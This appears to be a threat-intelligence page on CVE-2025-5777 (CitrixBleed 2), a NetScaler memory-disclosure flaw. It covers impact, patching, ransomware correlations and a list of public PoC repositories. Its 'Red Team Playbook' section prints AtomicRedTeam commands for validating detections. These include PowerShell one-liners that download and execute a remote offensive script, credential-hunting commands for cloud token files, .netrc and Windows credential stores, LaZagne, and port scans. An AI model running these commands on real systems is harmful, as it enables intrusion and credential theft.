CVE-2025-5777
Overview
This vulnerability is a memory overread caused by insufficient input validation within the NetScaler ADC's Gateway and AAA virtual server configurations. Specifically, the flaw arises when processing certain requests on the NetScaler Management Interface, leading to out-of-bounds memory access. The affected components include VPN virtual servers such as ICA Proxy, CVPN, and RDP Proxy, as well as AAA virtual servers, where improper handling of input data triggers the vulnerability.
Vulnerability Description
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Impact
An unauthenticated attacker can exploit this vulnerability to leak sensitive information from NetScaler memory, including session tokens and credentials. This exposure can facilitate unauthorized access to protected resources and compromise user sessions. No user interaction or valid credentials are required to trigger the memory disclosure, enabling remote attackers to conduct reconnaissance or escalate privileges within the environment. The resulting data breach can impact confidentiality and integrity of enterprise network communications.
Solution
Citrix has published a security advisory detailing patches for affected NetScaler ADC versions addressing this memory disclosure vulnerability. Administrators should apply updates as per Citrix article CTX693420, which provides specific remediation steps and patched firmware versions. The advisory covers all affected configurations including Gateway and AAA virtual servers. Refer to the official Citrix support page for download links and detailed installation instructions to ensure complete mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question arises from insufficient input validation within specific configurations of Citrix NetScaler, particularly when deployed as a Gateway or AAA virtual server. This flaw allows for a memory overread, which can potentially expose sensitive information stored in memory. The nature of this vulnerability is particularly concerning because it can be exploited by an attacker to gain unauthorized access to data that should remain confidential. Memory overreads can lead to the disclosure of sensitive information, such as user credentials, session tokens, or other critical data, which can be leveraged for further attacks or unauthorized access to systems.
Attack vectors for this vulnerability are varied and can be executed through multiple means. An attacker could exploit this flaw by crafting malicious requests that bypass the input validation mechanisms of the affected NetScaler configurations. For instance, if the device is configured as a VPN virtual server or an RDP Proxy, an attacker could potentially send specially crafted packets that trigger the memory overread condition. This could occur during normal operations, such as user authentication or data transmission, allowing the attacker to extract sensitive information without raising immediate alarms. Furthermore, the exploitation could be automated, enabling attackers to target multiple devices simultaneously, increasing the potential impact.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on Citrix NetScaler for secure remote access and application delivery. The high CVSS score indicates a critical risk level, suggesting that successful exploitation could lead to severe consequences, including data breaches, loss of customer trust, and potential regulatory penalties. Organizations that handle sensitive data, such as financial institutions or healthcare providers, face heightened risks, as the exposure of personal or financial information could result in substantial financial losses and reputational damage. Additionally, the presence of this vulnerability could lead to increased scrutiny from regulatory bodies, further compounding the business risks.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected Citrix NetScaler products is essential, as vendors typically release security updates to address known vulnerabilities. Organizations should also conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations. Network monitoring tools can be employed to detect unusual patterns of traffic that may indicate exploitation attempts. Furthermore, implementing strict access controls and user authentication mechanisms can help limit the potential impact of an attack, ensuring that even if exploitation occurs, the attacker has limited access to sensitive systems.
In conclusion, the vulnerability stemming from insufficient input validation in Citrix NetScaler poses a serious threat to organizations utilizing these products for secure access and application delivery. The potential for memory overreads to expose sensitive information necessitates immediate attention and action from affected organizations. By adopting proactive detection and mitigation strategies, businesses can safeguard their systems against exploitation and maintain the integrity and confidentiality of their data. The importance of vigilance in cybersecurity cannot be overstated, particularly in an era where the stakes are continually rising.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2025-5777, reflecting a modest rise in attacker interest despite a marginal decline in the EPSS score. This divergence suggests that while the overall likelihood of widespread exploitation may be stabilizing or decreasing, adversaries—particularly ransomware groups such as Akira and Sinobi—continue to probe vulnerable NetScaler deployments actively. The persistence of multiple publicly available proof-of-concept exploits further lowers the barrier for threat actors to weaponize this vulnerability. Consequently, defenders should recognize that the threat remains dynamic, with ongoing reconnaissance and exploitation efforts maintaining pressure on affected environments. The risk level, therefore, remains elevated, underscoring the continued relevance of vigilant monitoring and threat detection aligned with emerging attacker behaviors.
Update 2 — July 03, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-5777, accompanied by the emergence of new proof-of-concept tools that broaden the exploit landscape. This development indicates that threat actors are actively refining and diversifying their capabilities to leverage the insufficient input validation vulnerability in NetScaler ADC configurations. Although the EPSS score remains at a high plateau, the increased telemetry activity signals heightened adversary interest and operational tempo. The ongoing association of ransomware groups such as Akira and Sinobi with campaigns exploiting this vulnerability further elevates the risk profile, underscoring the potential for more frequent and sophisticated attacks. Collectively, these factors contribute to a sustained high threat level, emphasizing that the vulnerability continues to be a focal point for malicious actors seeking to compromise enterprise networks.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Citrix NetScaler ADC/Gateway 14.1 - Memory Disclosure | Yesith Alvarez | remote | multiple | - | View |
GitHub PoCs (24)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
win3zz/CVE-2025-5777
CVE-2025-5777 (CitrixBleed 2) - Critical memory leak vulnerability affecting Citrix NetScaler ADC and Gateway devices
|
win3zz | 47 | 14 | 2025-07-08 | View |
|
bughuntar/CVE-2025-5777
CVE-2025-5777 Citrix NetScaler Memory Leak Exploit (CitrixBleed 2)
|
bughuntar | 30 | 7 | 2025-07-10 | View |
|
mingshenhk/CitrixBleed-2-CVE-2025-5777-PoC-
详细讲解CitrixBleed 2 — CVE-2025-5777(越界泄漏)PoC 和检测套件
|
mingshenhk | 17 | 2 | 2025-06-30 | View |
|
Chocapikk/CVE-2025-5777
CitrixBleed 2 (CVE-2025-5777)
|
Chocapikk | 7 | 0 | 2025-07-08 | View |
|
soltanali0/CVE-2025-5777-Exploit
|
soltanali0 | 4 | 1 | 2025-08-07 | View |
|
RickGeex/CVE-2025-5777-CitrixBleed
CitrixBleed-2 (CVE-2025-5777) – proof-of-concept exploit for NetScaler ADC/Gateway “memory bleed”
|
RickGeex | 1 | 4 | 2025-07-04 | View |
|
nocerainfosec/cve-2025-5777
Memory disclosure vulnerability in Citrix NetScaler ADC and Gateway when configured as a Gateway (VPN virtual server, IC...
|
nocerainfosec | 3 | 1 | 2025-07-05 | View |
|
Shivshantp/CVE-2025-5777-TrendMicro-ApexCentral-RCE
PoC for CVE-2025-5777 – Auth Bypass and RCE in Trend Micro Apex Central
|
Shivshantp | 4 | 0 | 2025-07-23 | View |
|
ndr-repo/CVE-2025-5777
Exploit for CVE-2025-5777: Citrix NetScaler Memory Disclosure (CitrixBleed 2)
|
ndr-repo | 3 | 1 | 2025-08-20 | View |
|
cyberleelawat/ExploitVeer
An advanced, powerful, and easy-to-use tool designed to detect and exploit CVE-2025-5777 (CitrixBleed 2). This script no...
|
cyberleelawat | 2 | 1 | 2025-07-15 | View |
|
orange0Mint/CitrixBleed-2-CVE-2025-5777
CitrixBleed-2 Checker & Poc automatic exploit and check token.
|
orange0Mint | 2 | 0 | 2025-07-06 | View |
|
0xgh057r3c0n/CVE-2025-5777
Citrix NetScaler Memory Leak PoC
|
0xgh057r3c0n | 0 | 2 | 2025-07-10 | View |
|
rootxsushant/Citrix-NetScaler-Memory-Leak-CVE-2025-5777
Update the old POC of CVE-2025-5777 Citrix NetScaler Memory leak
|
rootxsushant | 0 | 1 | 2025-08-11 | View |
|
0xBlackash/CVE-2025-5777
CVE-2025-5777
|
0xBlackash | 0 | 1 | 2026-03-02 | View |
|
sentinel-aidefense/CVE-2025-5777
|
sentinel-aidefense | 0 | 0 | 2026-07-02 | View |
|
rob0tstxt/POC-CVE-2025-5777
|
rob0tstxt | 0 | 0 | 2025-07-24 | View |
|
below0day/Honeypot-Logs-CVE-2025-5777
CitrixBleed 2 NetScaler honeypot logs
|
below0day | 0 | 0 | 2025-07-30 | View |
|
SleepNotF0und/CVE-2025-5777
CVE-2025-5777 (CitrixBleed 2) - [Citrix NetScaler ADC] [Citrix Gateway]
|
SleepNotF0und | 0 | 0 | 2025-07-15 | View |
|
idobarel/CVE-2025-5777
CitrixBleed2 poc
|
idobarel | 0 | 0 | 2025-07-05 | View |
|
RaR1991/citrix_bleed_2
Citrix Bleed 2 PoC Scanner (CVE-2025-5777)
|
RaR1991 | 0 | 0 | 2025-07-06 | View |
|
FrenzisRed/CVE-2025-5777
CitrixBleed2 powershell version
|
FrenzisRed | 0 | 0 | 2025-07-09 | View |
|
mr-r3b00t/CVE-2025-5777
placeholder for CitrixBleed 2.0 CVE-2025-5777
|
mr-r3b00t | 0 | 0 | 2025-11-16 | View |
|
Anshika2709/Citrixbleed2-CVE-2025-5777
POC
|
Anshika2709 | 0 | 0 | 2025-11-22 | View |
|
rashedhasan090/CVE-2025-5777
|
rashedhasan090 | 0 | 0 | 2025-11-23 | View |
Ransomware Groups 5
Threat Feed
43 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-540 | Overread Buffers |
33%
|
Low | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.